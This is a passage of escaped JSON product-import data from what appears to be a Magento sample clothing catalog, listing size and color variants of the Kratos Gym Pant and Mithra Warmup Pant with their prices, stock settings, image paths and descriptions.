Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"kratos-gym-pant-34-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp05-blue_back.jpg,\\/m\\/p\\/mp05-blue_outfit.jpg\",\"image\":\"\\/m\\/p\\/mp05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp05-blue_back.jpg,\\/m\\/p\\/mp05-blue_outfit.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Blue\"},\"738\":{\"sku\":\"MP05-34-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Kratos Gym Pant-34-Green\",\"description\":\"<p>Like it\'s namesake god of strength, the Kratos Gym Pant help you bring your best to bear on weight-based, plyometric and endurance exercise. They stretch and support in all the right places while ultra-light construction and moisture-wicking technology provide comfort.<\\/p>\\n<p>&bull; Navy cotton straight leg pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; 2 side-seam pockets. <br \\/>&bull; Internal zip pocket. <br \\/>&bull; Drawstring waist. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"kratos-gym-pant-34-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp05-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp05-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp05-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp05-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp05-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Green\"},\"739\":{\"sku\":\"MP05-36-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Kratos Gym Pant-36-Black\",\"description\":\"<p>Like it\'s namesake god of strength, the Kratos Gym Pant help you bring your best to bear on weight-based, plyometric and endurance exercise. They stretch and support in all the right places while ultra-light construction and moisture-wicking technology provide comfort.<\\/p>\\n<p>&bull; Navy cotton straight leg pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; 2 side-seam pockets. <br \\/>&bull; Internal zip pocket. <br \\/>&bull; Drawstring waist. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"kratos-gym-pant-36-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp05-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp05-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp05-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp05-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp05-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Black\"},\"740\":{\"sku\":\"MP05-36-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Kratos Gym Pant-36-Blue\",\"description\":\"<p>Like it\'s namesake god of strength, the Kratos Gym Pant help you bring your best to bear on weight-based, plyometric and endurance exercise. They stretch and support in all the right places while ultra-light construction and moisture-wicking technology provide comfort.<\\/p>\\n<p>&bull; Navy cotton straight leg pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; 2 side-seam pockets. <br \\/>&bull; Internal zip pocket. <br \\/>&bull; Drawstring waist. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"kratos-gym-pant-36-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp05-blue_back.jpg,\\/m\\/p\\/mp05-blue_outfit.jpg\",\"image\":\"\\/m\\/p\\/mp05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp05-blue_back.jpg,\\/m\\/p\\/mp05-blue_outfit.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Blue\"},\"741\":{\"sku\":\"MP05-36-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Kratos Gym Pant-36-Green\",\"description\":\"<p>Like it\'s namesake god of strength, the Kratos Gym Pant help you bring your best to bear on weight-based, plyometric and endurance exercise. They stretch and support in all the right places while ultra-light construction and moisture-wicking technology provide comfort.<\\/p>\\n<p>&bull; Navy cotton straight leg pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; 2 side-seam pockets. <br \\/>&bull; Internal zip pocket. <br \\/>&bull; Drawstring waist. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"kratos-gym-pant-36-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp05-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp05-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp05-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp05-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp05-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Green\"},\"742\":{\"sku\":\"MP05\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Kratos Gym Pant\",\"description\":\"<p>Like it\'s namesake god of strength, the Kratos Gym Pant help you bring your best to bear on weight-based, plyometric and endurance exercise. They stretch and support in all the right places while ultra-light construction and moisture-wicking technology provide comfort.<\\/p>\\n<p>&bull; Navy cotton straight leg pants.<br \\/>&bull; Relaxed fit. <br \\/>&bull; 2 side-seam pockets. <br \\/>&bull; Internal zip pocket. <br \\/>&bull; Drawstring waist. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp05-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp05-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp05-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Workout Pants|Base Layer,material=Organic Cotton|Polyester|Rayon,pattern=Solid,climate=Spring|Windy|Wintry,eco_collection=No,performance_fabric=No,erin_recommends=No,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MP05-32-Black,size=32,color=Black|sku=MP05-32-Blue,size=32,color=Blue|sku=MP05-32-Green,size=32,color=Green|sku=MP05-33-Black,size=33,color=Black|sku=MP05-33-Blue,size=33,color=Blue|sku=MP05-33-Green,size=33,color=Green|sku=MP05-34-Black,size=34,color=Black|sku=MP05-34-Blue,size=34,color=Blue|sku=MP05-34-Green,size=34,color=Green|sku=MP05-36-Black,size=36,color=Black|sku=MP05-36-Blue,size=36,color=Blue|sku=MP05-36-Green,size=36,color=Green\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp05-blue_back.jpg,\\/m\\/p\\/mp05-blue_outfit.jpg\",\"image\":\"\\/m\\/p\\/mp05-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp05-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp05-blue_back.jpg,\\/m\\/p\\/mp05-blue_outfit.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Workout Pants|Base Layer\",\"material\":\"Organic Cotton|Polyester|Rayon\",\"pattern\":\"Solid\",\"climate\":\"Spring|Windy|Wintry\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"Yes\",\"sale\":\"No\"},\"743\":{\"sku\":\"MP06-32-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Mithra Warmup Pant-32-Gray\",\"description\":\"<p>When you\'re not sure you\'re up to the weather, don the Mithra Warmup Pant for a confidence boost. Its supersoft, stretchy fabric and fleece-like finish help prep your muscles and ease your mind. Designed for relaxed, easy-wear fit with handy ankle zips.<\\/p>\\n<p>&bull; Ankle zips.<br \\/>&bull; Elasticized waistband with draw cord.<br \\/>&bull; Dual hand pockets.<br \\/>&bull; Reflective elements for low-light safety.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mithra-warmup-pant-32-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp06-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp06-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp06-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp06-gray_back.jpg,\\/m\\/p\\/mp06-gray_outfit.jpg\",\"image\":\"\\/m\\/p\\/mp06-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp06-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp06-gray_back.jpg,\\/m\\/p\\/mp06-gray_outfit.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Gray\"},\"744\":{\"sku\":\"MP06-32-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Mithra Warmup Pant-32-Green\",\"description\":\"<p>When you\'re not sure you\'re up to the weather, don the Mithra Warmup Pant for a confidence boost. Its supersoft, stretchy fabric and fleece-like finish help prep your muscles and ease your mind. Designed for relaxed, easy-wear fit with handy ankle zips.<\\/p>\\n<p>&bull; Ankle zips.<br \\/>&bull; Elasticized waistband with draw cord.<br \\/>&bull; Dual hand pockets.<br \\/>&bull; Reflective elements for low-light safety.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mithra-warmup-pant-32-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp06-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp06-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp06-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp06-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp06-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Green\"},\"745\":{\"sku\":\"MP06-32-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Mithra Warmup Pant-32-Orange\",\"description\":\"<p>When you\'re not sure you\'re up to the weather, don the Mithra Warmup Pant for a confidence boost. Its supersoft, stretchy fabric and fleece-like finish help prep your muscles and ease your mind. Designed for relaxed, easy-wear fit with handy ankle zips.<\\/p>\\n<p>&bull; Ankle zips.<br \\/>&bull; Elasticized waistband with draw cord.<br \\/>&bull; Dual hand pockets.<br \\/>&bull; Reflective elements for low-light safety.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 